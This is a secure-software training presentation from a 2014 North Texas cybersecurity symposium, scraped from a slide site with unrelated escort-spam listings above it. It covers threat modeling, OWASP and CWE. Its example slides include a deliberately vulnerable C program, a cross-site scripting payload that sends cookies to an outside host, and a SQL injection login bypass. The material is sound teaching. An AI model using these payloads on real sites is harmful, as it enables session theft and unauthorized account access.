➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
 
Microsoft Azure Arc Customer Deck Microsoft
Microsoft Azure Arc Customer Deck MicrosoftMicrosoft Azure Arc Customer Deck Microsoft
Microsoft Azure Arc Customer Deck Microsoft
 
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
 
Wadgaon Sheri $ Call Girls Pune 10k @ I'm VIP Independent Escorts Girls 80057...
Wadgaon Sheri $ Call Girls Pune 10k @ I'm VIP Independent Escorts Girls 80057...Wadgaon Sheri $ Call Girls Pune 10k @ I'm VIP Independent Escorts Girls 80057...
Wadgaon Sheri $ Call Girls Pune 10k @ I'm VIP Independent Escorts Girls 80057...
 
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready ...Nanded City ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
 

NTXISSACSC2 - Software Assurance (SwA) by John Whited

  • 1. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 1 Collin College – North Texas Cyber Security Symposium Software Assurance (SwA)
  • 2. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 2 #define BUFSIZE 256 int main(int argc, char **argv) { char buf[BUFSIZE]; strcpy(buf, argv[1]); printf(buf); } Writing Code is So Easy, Right? • See anything wrong with this simple C-language program? • Later in the presentation, we will enumerate the flaws
  • 3. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 3 Agenda • What is Software Assurance (SwA)? • Why is SwA important? • When are SwA principles applied? • What are some SwA best practices? • May I see some examples, please? • Summary • Q&A
  • 4. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 4 Collin College – North Texas Cyber Security Symposium Question 1: What is Software Assurance (SwA)?
  • 5. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 5 Let’s Begin with Information Assurance (IA) C I A = Confidentiality = Integrity = Availability C I A Information Assurance (IA) – Measures that protect and defend information and information systems by ensuring their availability, integrity, authentication, confidentiality, and non-repudiation. These measures include providing for restoration of information systems by incorporating protection, detection, and reaction capabilities. Identification – Who are you? Authentication – Prove your identity Authorization – What are you allowed to do? Accountability – Record all security relevant activities for subsequent review Non-repudiation – You cannot prove that a security relevant event was not undertaken by an entity bearing your identity • Confidentiality – Prevent unauthorized disclosure of information • Integrity – Ensure that information is not altered in an unauthorized manner • Availability – Make information available to authorized users, even when under attack
  • 6. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 6 Some IA Framework Domains – SwA is One Written, distributed, and enforced IA policies and procedures Risk management Risk assessment Control selection Control implementation Control monitoring Physical security Operational security Subjects (both people and software): identification, authentication, authorization Objects: access control Crypto key management Continuous monitoring (IDS, IPS, DLP) leading to situational awareness Incident management & disaster recovery Configuration management (operational environment) Patch management Personnel security Education, training, and awareness Clearances Separation of duties Rotation of duties Activity monitoring Component security HW counterfeit protection HW anti-tamper Software assurance Supply chain assurance Supplier practices Product assurance Configuration management (development environment)
  • 7. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 7 What is Application Security? Application Security IS NOT: • Network Security, Firewalls, Intrusion Detection Systems, Operating System Hardening, Database Hardening, etc. - These are all useful and necessary to ensure the overall security of the Enterprise, but they address different risks • Common myths - “We have a firewall!” - It’s an “Internal Application” - It’s protected by SSO • An afterthought • Out of scope or a “nice to have”
  • 8. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 8 What is Application Security? Application Security IS: • Providing reliable, confidential, and valid information at the application layer • e.g., Securing the “custom code” that drives a web application • “Built In” not “Bolted On” - Application Security needs to be built into the application throughout the software development lifecycle. - It should not be an afterthought after designing, developing, and deploying a solution • A requirement and a responsibility
  • 9. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 9 How is SwA Formally Defined? • Synonymous with Application Security, Secure Software, and Secure Application Development… a lifecycle endeavor CNSSI 4009, “National Information Assurance (IA) Glossary”, Entry for Software Assurance (SwA) - “Level of confidence that software is free from vulnerabilities, either intentionally designed into the software or accidentally inserted at anytime during its lifecycle and that the software functions in the intended manner.” - In other words, the software does what it’s supposed to do  Meets all requirements - But the software does not do things it’s not supposed to do  No Easter eggs, no backdoors  No vulnerabilities introduced by poor coding practices Synonymous with Application Security, Secure Software, and Secure Application Development… SwA is a lifecycle endeavor
  • 10. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 10 SAFECode is a non-profit organization that promotes the best practices of proven software assurance methods. They define the three pillars of SwA as follows SAFECode Three Pillars of Software Assurance • Security – Software is developed in accordance with secure lifecycle development principles • Authenticity – The recipient of the software is provided a level of confidence that the software originated with the expected source • Integrity – The recipient of the software is provided means to verify that the software was not altered in any way by any party during transit through the supply chain
  • 11. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 11 SwA Addresses Trustworthiness Predictable Execution Conformance Planned and systematic set of multi-disciplinary activities that ensure software processes and products conform to requirements, standards / procedures Justifiable confidence that software, when executed, functions as intended https://buildsecurityin.us-cert.gov DHS Software and Supply Chain Assurance Build Security In No exploitable vulnerabilities exist, either maliciously or unintentionally inserted
  • 12. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 12 SwA Addresses Trustworthiness Predictable Execution Conformance Planned and systematic set of multi-disciplinary activities that ensure software processes and products conform to requirements, standards / procedures Justifiable confidence that software, when executed, functions as intended No exploitable vulnerabilities exist, either maliciously or unintentionally inserted https://buildsecurityin.us-cert.gov DHS Software and Supply Chain Assurance Build Security In
  • 13. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 13 SwA Addresses Trustworthiness Predictable Execution Conformance Planned and systematic set of multi-disciplinary activities that ensure software processes and products conform to requirements, standards / procedures Justifiable confidence that software, when executed, functions as intended No exploitable vulnerabilities exist, either maliciously or unintentionally inserted https://buildsecurityin.us-cert.gov DHS Software and Supply Chain Assurance Build Security In
  • 14. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 14 It is also important to understand that software assurance is the responsibility of many disciplines, including… SwA is Much More Than Just Writing Code • Program Management • Systems Engineering • Software Engineering • Security Engineering • Supply Chain
  • 15. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 15 Collin College – North Texas Cyber Security Symposium Question 2: Why is SwA important?
  • 16. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 16 Software Applications - The New Attack Target • Application security has often been ignored, in part because of the faulty assumption that firewalls and other perimeter defenses can protect the functional code. • The problem is further compounded as application developers without specific security training are typically unaware of the ways their software, while meeting functional requirements, could be compromised. • As the operating system and network security vulnerabilities have been reduced over time, applications have become the next attack target. Today the attackers are targeting the applications
  • 17. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 17 Internet DMZ Trusted Inside Corporate Inside HTTP(S) SMTP SSL Firewall only allows PORT 80 (or 443 SSL) traffic from the Internet to the web server. Any – Web Server: 80 Firewall only allows applications on the web server to talk to application server. Firewall only allows application server to talk to database server. IIS Sun ONE Apache/Tomcat ASP .NET WebSphere Java SQL Oracle DB2 FTP TELNET Vulnerable applications expose the internal network. Here is an example of vulnerability risks, even with perimeter defenses in place. The diagram shows several firewalls constructed at different points of access with a network. Applications Breach the Perimeter
  • 18. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 18 • The consequences of a security breach are detrimental - Information is a valuable asset to the Company and we need to protect the way we access and modify it - Application Security has a direct effect on the Company's profit - Application Security has a direct effect on the Company's reputation The Impact of Vulnerable Applications
  • 19. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 19 Collin College – North Texas Cyber Security Symposium Question 3: When are SwA principles applied?
  • 20. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 20 SwA Spans The Entire Development Lifecycle It’s NOT just about writing code! Training • Software Assurancefor Managers • Software Assurance Practitioner • Cyber Professional • CSSLP Initiation, Development and Acquisition • Threat,Attack Surface,and Misuse Case Modeling • Requirements Management • IBM Rational Doors Implementation and Assessment • Static Source Code Analysis • Static Binary Code Analysis • Dynamic Binary Analysis • 3rd Party Reviews Operations and Maintenance Disposal Certified Software Management • Continuous Assessment • Patching • Configuration Management • 3rd Party Reviews Whole System Monitoring • Detection • Correlation • Visualization • Response • Secure Coding Standard
  • 21. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 21 Source: The Economic Impacts of Inadequate Infrastructure for Software Testing, NIST, May 2002, http://www.nist.gov/director/planning/upload/report02-3.pdf Pay Me Now ($), or Pay Me Later ($$$) Hours to Fix Defects by Development PhaseHours to Fix Defects by Development Phase Addendum • Security • Cost ~ Hrs to fix + Penalties + Brand repair + ??? NIST study • Quality • Cost ~ Hrs to fix
  • 22. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 22 Microsoft Secure Development Lifecycle Ongoing Process Improvements ProcessEducation Accountability http://www.microsoft.com/security/sdl/default.aspx
  • 23. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 23 Collin College – North Texas Cyber Security Symposium Question 4: What are some SwA best practices?
  • 24. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 24 • Software developers should be trained in assured software development practices • Software managers should be trained to understand and advocate software assurance. • Software assurance should be treated as an integrated, required part of the software development life cycle process. • Software assurance should be included in program reviews for projects that require developed software Industry Best Practices
  • 25. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 25 Training • Software Assurance for Managers • Software Assurance Practitioner • Cyber Professional • CSSLP Initiation, Development and Acquisition • Threat, Attack Surface, and Misuse Case Modeling • Requirements Management • IBM Rational Doors Implementation and Assessment • Static Source Code Analysis • Static Binary Code Analysis • Dynamic Binary Analysis • 3rd Party Reviews Operations and Maintenance Disposal Certified Software Management • Continuous Assessment • Patching • Configuration Management • 3rd Party Reviews Whole System Monitoring • Detection • Correlation • Visualization • Response Training and Awareness Train SW leads, develop community of SwA SMEs • Secure Coding Standard
  • 26. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 26 • Government - DHS / DoD Build Security In Web Site • Industry - SAFECode One Hour Training Videos - Lone Star Application Security Conference (LASCON)  Held in Austin TX, sponsored by Austin OWASP Chapter  Focus on web application security  Often preceded by 1-3 days of relevant SwA training Available Training Click Here Click Here Click Here
  • 27. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 27 Lots of Reference Help is Available • For Awareness and Guidance - DHS / DoD Build-Security-In Pocket Guide series - https://buildsecurityin.us-cert.gov/swa/software-assurance-pocket-guide-series • For Developers - MITRE CWE  Common Weakness Enumeration  http://cwe.mitre.org - SANS / CWE Top 25 Most Dangerous Software Errors  See MITRE CWE  http://www.sans.org/top25-software-errors - OWASP Top Ten  Focused on web applications (increased attack surface)  https://www.owasp.org/index.php/Top_10_2013-Top_10
  • 28. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 28 Training • Software Assurance for Managers • Software Assurance Practitioner • Cyber Professional • CSSLP Initiation, Development and Acquisition • Threat, Attack Surface, and Misuse Case Modeling • Requirements Management • IBM Rational Doors Implementation and Assessment • Static Source Code Analysis • Static Binary Code Analysis • Dynamic Binary Analysis • 3rd Party Reviews Operations and Maintenance Disposal Certified Software Management • Continuous Assessment • Patching • Configuration Management • 3rd Party Reviews Whole System Monitoring • Detection • Correlation • Visualization • Response Requirements Management There’s functional security requirements… and then there’s the “ilities” • Secure Coding Standard
  • 29. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 29 Common General Concepts • Economy of Mechanism - Keep the design as simple and small as possible. (Keep it simple stupid) • Least Common Mechanism - Minimize the amount of mechanism common to more than one user and depended on by all users. (Opposite of Economy of Mechanism.) • Complete Mediation - Every access to every object must be checked for authority. • Failing Securely - Base access decisions on permission rather than exclusion. • Psychological Acceptability - It is essential that the human interface be designed for ease of use, so that users routinely and automatically apply the protection mechanisms correctly.
  • 30. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 30 SAFE Code Secure Design Principles • Threat Modeling • Use Least Privilege • Implement Sandboxing • Secure Coding Practices • Validate Input and Output to Mitigate Common Vulnerabilities • Use Robust Integer Operations for Dynamic Memory Allocations and Array Offsets • Use Anti-Cross Site Scripting (XSS) Libraries • Use Canonical Data Formats • Avoid String Concatenation for Dynamic SQL Statements • Eliminate Weak Cryptography • Use Logging and Tracing Source: http://www.safecode.org/publications/SAFECode_Dev_Practices0211.pdf
  • 31. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 31 Training • Software Assurance for Managers • Software Assurance Practitioner • Cyber Professional • CSSLP Initiation, Development and Acquisition • Threat, Attack Surface, and Misuse Case Modeling • Requirements Management • IBM Rational Doors Implementation and Assessment • Static Source Code Analysis • Static Binary Code Analysis • Dynamic Binary Analysis • 3rd Party Reviews Operations and Maintenance Disposal Certified Software Management • Continuous Assessment • Patching • Configuration Management • 3rd Party Reviews Whole System Monitoring • Detection • Correlation • Visualization • Response Threat Analysis and Attack Surface Essential during architecture and high-level design • Secure Coding Standard
  • 32. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 32 Threat Analysis  Who? – Adversary characterization  What? – Threat categories  Where? – Attack surface analysis  How? – Attack trees  All the above? – Attack Patterns Know Your Enemy and Think Like An Attacker Threat Analysis
  • 33. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 33 • Script kiddies – Low-skilled, unfunded, just for fun • Identity thieves – Highly skilled, business model, financial motives • Nation states – Very highly skilled, very highly funded, political and military objectives, theft of corporate IP • Hactivists – Ranging skills, lightly funded, highly motivated by social or political objectives Who – Threat Actors
  • 34. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 34 STRIDE is an acronym that stands for the six threat categories documented in Howard and Leblanc’s Writing Secure Code. STRIDE stands for the following: Swiderski, F. & Snyder, W. Threat Modeling. Redmond, WA: Microsoft Press, 2004 Spoofing Can the software or end user be tricked into seeing some data as something other than what it actually is? Examples include packet spoofing and user interface spoofing. Tamperingwithdata Can someone that shouldn’t have access to modifying or deleting the data do so? Repudiation Is it possible to prove which actions a user has taken? For example, are important actions logged and are the logs accurate? Informationdisclosure Is only necessary information given to users? Can the additional information reveal information about the target system or users? Denialofservice Is an attacker able to prevent legitimate users from accessing the application? Elevationofprivilege Is an attacker able to perform actions that only higher- privileged users should be allowed to perform? What – STRIDE Threat Categories
  • 35. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 35 • Attack Surface = Accessible entry points and exit points of an application or system - Entry points are the inputs to the application through interfaces, services, protocols, and code - Exit points are the outputs from the application, including error messages produced by the application in response to user interaction • Goal: Reduce the attack surface of the software application or system - Disable unused services and protocols - Generic error messages Where – Attack Surface Analysis
  • 36. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 36 • The aim for secure development is to reduce the overall risk by reducing the attack surface area. • One can reduce the attack surface area by: - Reducing the amount of code executing  Turn off features - Reducing the volume of code accessible to users  Least privilege - Limit the damage if the code is exploited How to Minimize Attack Surface Area
  • 37. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 37 • Provides a formal method of modeling threats against a computer system or SW application • Root node = Goal • Leaf nodes are different ways of achieving the goal • Child nodes are Sub-Goals - Ex. “Learn Password” • All sub-goals must be satisfied before the main goal is achieved Threaten Blackmail Steal Bribe Log into Unix Account Learn Password Guess Password Use Widely Known Password Find Written Password Get Password From Target Install Keyboard Sniffer Obtain Sniffer Output File No Password Required and How – Attack Trees
  • 38. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 38 • The MITRE Corporation - Government sponsored non-profit organization - Federally Funded Research and Development Center (FFRDC) • Software Assurance Strategic Initiative - Department of Homeland Security - Co-sponsored by the National Cyber Security Division • Database of attack methods used by hackers to exploit software • Understand how weaknesses and vulnerabilities lead to a compromise Mechanism of Attack Data Leakage Attacks Resource Depletion Injection Spoofing Time and State Attacks Abuse of Functionality Probabilistic Techniques Exploitation of Authentication Exploitation of Privilege/Trust Data Structure Attacks Resource Manipulation Physical Security Attacks Network Reconnaissance Social Engineering Attacks Supply Chain Attacks CAPEC – Common Attack Pattern and Enumeration Classification
  • 39. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 39 CAPEC – Common Attack Pattern and Enumeration Classification • Probing an application through its error messages - Fuzzing input parameters to cause errors - Learn about the system  Error Messages  System behavior Description Attack Prerequisites Typical Likelihood of Exploit Examples – Instances Attacker Skills or Knowledge Required Resources Required Indicators – Warnings of Attack Obfuscation Techniques * Solutions and Mitigations *
  • 40. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 40 Training • Software Assurance for Managers • Software Assurance Practitioner • Cyber Professional • CSSLP Initiation, Development and Acquisition • Threat, Attack Surface, and Misuse Case Modeling • Requirements Management • IBM Rational Doors Implementation and Assessment • Static Source Code Analysis • Static Binary Code Analysis • Dynamic Binary Analysis • 3rd Party Reviews Operations and Maintenance Disposal Certified Software Management • Continuous Assessment • Patching • Configuration Management • 3rd Party Reviews Whole System Monitoring • Detection • Correlation • Visualization • Response Misuse / Abuse Case Modeling Think like an attacker • Secure Coding Standard
  • 41. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 41 Misuse Case Diagram • Start with use cases (white hat) • “Think like a bad guy” (black hat) • For each use case, ask “How might an attacker try to exploit this use case?
  • 42. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 42 Training • Software Assurance for Managers • Software Assurance Practitioner • Cyber Professional • CSSLP Initiation, Development and Acquisition • Threat, Attack Surface, and Misuse Case Modeling • Requirements Management • IBM Rational Doors Implementation and Assessment • Static Source Code Analysis • Static Binary Code Analysis • Dynamic Binary Analysis • 3rd Party Reviews Operations and Maintenance Disposal Certified Software Management • Continuous Assessment • Patching • Configuration Management • 3rd Party Reviews Whole System Monitoring • Detection • Correlation • Visualization • Response Implementation SwA is not all about writing code… but it is a lot about writing code • Secure Coding Standard
  • 43. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 43 CERT Top 10 Secure Coding Practices Adopt a secure coding standard Use effective quality assurance techniques Practice defense in depth Sanitize data sent to other systems Adhere to the principle of least privilege Default denyKeep it simple Architect and design for security policies Heed compiler warnings Adhere to the principle of least privilege Validate Input Heed compiler warnings Architect and design for security policies Keep it simple Default deny Sanitize data sent to other systems Practice defense in depth Use effective quality assurance techniques Adopt a secure coding standard
  • 44. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 44 • Software Engineering Institute (SEI) – Carnegie Mellon University - Federally Funded Research and Development Center (FFRDC) • Computer Emergency Response Team (CERT) - The Morris Worm 11/1988  The first Internet worm  Wide mainstream media attention • Secure coding standards - C, C++, Java and Perl SEI-CERT Secure Coding Standards
  • 45. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 45 Training • Software Assurance for Managers • Software Assurance Practitioner • Cyber Professional • CSSLP Initiation, Development and Acquisition • Threat, Attack Surface, and Misuse Case Modeling • Requirements Management • IBM Rational Doors Implementation and Assessment • Static Source Code Analysis • Static Binary Code Analysis • Dynamic Binary Analysis • 3rd Party Reviews Operations and Maintenance Disposal Certified Software Management • Continuous Assessment • Patching • Configuration Management • 3rd Party Reviews Whole System Monitoring • Detection • Correlation • Visualization • Response SAST – Static Analysis Security Tool Coverity, HP-Fortify, Klocwork, Parasoft, Veracode, AdaCore (Ada) • Secure Coding Standard
  • 46. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 46 • The 2011 CWE/SANS Top 25 Most Dangerous Programming Errors is a list of the most widespread and critical programming errors that can lead to serious software vulnerabilities. Common Weakness Enumeration (CWE) Source: http://cwe.mitre.org
  • 47. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 47 2013 OWASP Top 10 1. Injection 2. Broken Authentication and Session Management 3. Cross-Site Scripting (XSS) 4. Insecure Direct Object References 5. Security Misconfiguration 6. Sensitive Data Exposure 7. Missing Function Level Access Control 8. Cross Site Request Forgery (CSRF) 9. Using Components with Known Vulnerabilities 10. Unvalidated Redirects and Forwards The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for- profit charitable organization focused on improving the security of software https://www.owasp.org/index.php/Top_10_2013-Top_10
  • 48. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 48 Training • Software Assurance for Managers • Software Assurance Practitioner • Cyber Professional • CSSLP Initiation, Development and Acquisition • Threat, Attack Surface, and Misuse Case Modeling • Requirements Management • IBM Rational Doors Implementation and Assessment • Static Source Code Analysis • Static Binary Code Analysis • Dynamic Binary Analysis • 3rd Party Reviews Operations and Maintenance Disposal Certified Software Management • Continuous Assessment • Patching • Configuration Management • 3rd Party Reviews Whole System Monitoring • Detection • Correlation • Visualization • Response Third Party Manual Code Reviews Sorry, it cannot all be automated • Secure Coding Standard
  • 49. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 49 Training • Software Assurance for Managers • Software Assurance Practitioner • Cyber Professional • CSSLP Initiation, Development and Acquisition • Threat, Attack Surface, and Misuse Case Modeling • Requirements Management • IBM Rational Doors Implementation and Assessment • Static Source Code Analysis • Static Binary Code Analysis • Dynamic Binary Analysis • 3rd Party Reviews Operations and Maintenance Disposal Certified Software Management • Continuous Assessment • Patching • Configuration Management • 3rd Party Reviews Whole System Monitoring • Detection • Correlation • Visualization • Response Dynamic Test Executable code now required • Secure Coding Standard
  • 50. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 50  White Box Testing  Typically have access to design docs, source code etc.  Static source code analysis  Dynamic source code analysis  Black Box Testing  Limited to no knowledge of the design  No access to source code  Fuzzing  Send random and malformed data, inputs etc to the application  Penetration Testing  Typically performed after an application has been deployed  Actual attack that attempts to compromise an application  and others… Types of Security Testing
  • 51. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 51 Training • Software Assurance for Managers • Software Assurance Practitioner • Cyber Professional • CSSLP Initiation, Development and Acquisition • Threat, Attack Surface, and Misuse Case Modeling • Requirements Management • IBM Rational Doors Implementation and Assessment • Static Source Code Analysis • Static Binary Code Analysis • Dynamic Binary Analysis • 3rd Party Reviews Operations and Maintenance Disposal Certified Software Management • Continuous Assessment • Patching • Configuration Management • 3rd Party Reviews Whole System Monitoring • Detection • Correlation • Visualization • Response Lifecycle Operations, Support, and Disposal SwA activity does not end until system End-Of-Life (EOL) • Secure Coding Standard
  • 52. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 52 Collin College – North Texas Cyber Security Symposium Question 5: May I see some examples, please?
  • 53. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 53 So What’s So Bad about This Small C-program? #define BUFSIZE 256 int main(int argc, char **argv) { char buf[BUFSIZE]; strcpy(buf, argv[1]); printf(buf); } • Remember this simple C-language program? Code does not check argc for number of arguments… potential null pointer dereference (CWE-476) Buffer of 256 bytes does not allocate space for null-terminator (CWE-193) Code does not validate content of argv[1] in any way (CWE-20) Buffer copy without checking size of destination buffer (CWE-120) Attacker can exploit code that does not provide a format string as the first argument to printf() functions… (CWE-134)
  • 54. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 54 Buffer Overflow “Smashing the Stack for Fun and Profit” #define BUFSIZE 256 int main(int argc, char **argv) { char buf[BUFSIZE]; strcpy(buf, argv[1]); } OOPS!
  • 55. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 55 Cross-Site Scripting – The Beginning • Consider the URL: • What hello.jsp looks like: • And the returned page is: http://www.foo.com/hello.jsp?name=John+Doe <html><body> Hello <%=request.getAttribute(“name”);%> </body></html> <html><body> Hello John Doe </body></html>
  • 56. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 56 Cross-Site Scripting – User Turns Mischievous • And if the URL is: • And the returned page is: • Then the user’s cookies for www.foo.com will pop up in an alert box on their screen • Who cares if someone can pop windows up on your screen – This is no big deal right? http://www.foo.com/hello.jsp?name=<script>alert(document.cook ie)</script> <html><body> Hello <script>alert(document.cookie)<script> </body></html>
  • 57. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 57 Cross-Site Scripting – User Turns Malicious • What if the URL is: • And the returned page is: • The user’s cookies have just been stolen by the malicious user at www.bar.com through Cross-Site Scripting and a “web bug” http://www.foo.com/hello.jsp?name=<script>document.write(‘<im g src=“http://www.bar.com/images/webbug.gif?cookie=’+ document.cookie+’”>’)</script> <html><body> Hello <script>document.write(‘<img src=“http://www.bar.com/images/webbug.gif?’+ document.cookie+’”>’)</script> </body></html>
  • 58. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 58 SQL Injection – The Beginning • Examine a very simple example of SQL Injection by considering the URL: • For the purposes of this application lets say it is used to edit the account details for a given user and retrieves the details for the user with the query: http://www.foo.com/edit.jsp?uid=test&password=secret SELECT * FROM usertable WHERE uid=‘test’ AND password=‘secret’;
  • 59. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 59 SQL Injection – User Turns Malicious • Now consider a slightly different query designed with malicious purposes in mind: • The consequences of adding a SQL comment (--) may be devastating, allowing the user to access the admin account with the evaluated SQL below: • Ignoring the comment (“--“ and all that follows), the SQL below is equivalent and gets all attributes for user “admin”… possibly including its hashed password! http://www.foo.com/edit.jsp?uid=admin’;--&password=whatever SELECT * FROM usertable WHERE uid=‘admin’;--’ AND password=‘whatever’; SELECT * FROM usertable WHERE uid=‘admin’;
  • 60. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 60 Collin College – North Texas Cyber Security Symposium Summary
  • 61. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 61 • Software Assurance is becoming a requirement, especially for US DoD contracts BE PREPARED! • The challenge is yours – will you commit to developing software in a secure fashion to protect the interests of customers, our nation, and all who use your software? Summary
  • 62. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 62 Questions?
  • 63. Sep 26-27, 2014 Collin College –North Texas Cyber Security Symposium 63 Presenter Bio John Whited, Principal Engineer, Raytheon, has 5 years of experience in Cybersecurity with expertise in Software Assurance (SwA) and secure development life cycles (SDLC). Prior to joining Raytheon, he was a software and a systems engineer in commercial telephony, holding five US patents on Intelligent Networks. He is also a CISSP and a CSSLP. He is a graduate of Texas Tech University with a Bachelors of Science and a Masters of Science in Electrical Engineering. He has made two joint presentations at the RSA Security Conference (2010 and 2012). E-mail: john.whited@raytheon.com